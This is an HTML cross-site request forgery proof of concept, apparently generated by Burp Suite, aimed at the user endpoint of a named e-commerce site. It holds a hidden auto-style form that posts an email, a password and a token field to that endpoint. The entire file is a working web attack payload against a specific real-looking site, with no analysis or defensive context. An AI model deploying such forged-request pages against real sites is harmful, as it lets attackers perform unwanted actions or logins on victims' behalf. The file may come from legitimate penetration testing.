<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="https://www.gambiaemarket.com/user" method="POST">

      <input type="hidden" name="csrf&#95;test&#95;name" value="a47c8a94946e7a90e101dd8681b2dad1" />

      <input type="hidden" name="email" value="test&#64;gmail&#46;com" />

      <input type="hidden" name="password" value="&#64;&#64;mM12345678" />

      <input type="hidden" name="login" value="" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

